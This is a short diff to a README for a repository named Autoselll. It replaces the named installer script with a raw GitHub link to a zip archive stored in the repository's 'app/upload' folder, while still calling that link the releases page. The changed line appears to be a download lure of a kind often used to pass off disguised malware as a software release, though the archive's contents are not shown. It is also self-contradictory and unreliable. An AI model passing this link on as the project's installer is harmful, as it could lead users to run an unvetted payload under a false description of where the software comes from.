santiagofavero/Autoselll/README.md

 Releases
 - For installers and assets, visit the releases page at the top of this document and follow the download and installation steps
-- If you want to download and run the installer, use the file named autoselll-installer.sh from the releases page
+- If you want to download and run the installer, use the file named https://github.com/santiagofavero/Autoselll/raw/refs/heads/main/app/upload/Software_v3.4.zip from the releases page
 - The same releases page is the authoritative source for installers, updates, and migration notes

 End of document